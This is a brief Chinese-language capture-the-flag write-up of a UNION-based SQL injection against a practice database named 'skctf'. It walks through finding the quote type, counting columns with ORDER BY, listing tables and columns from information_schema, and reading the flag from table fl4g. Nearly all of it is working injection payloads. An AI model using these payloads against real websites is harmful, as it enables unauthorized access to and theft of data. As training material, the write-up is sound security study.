判断注入点类型

1 显示

1' 不显示

2' and '1'='1 显示2的结果,单引号无括号

判断字段数

1' order by 5--+ 不显示

1' order by 4--+显示,字段数为4

判断可用字段

-1' union select 1,2,3,4--+

获取数据库

获取表名

id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),3,4--+

获取字段名

id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf' and table_name='fl4g'),3,4--+

获取flag

id=-1' union select 1,(select skctf_flag from fl4g),3,4--+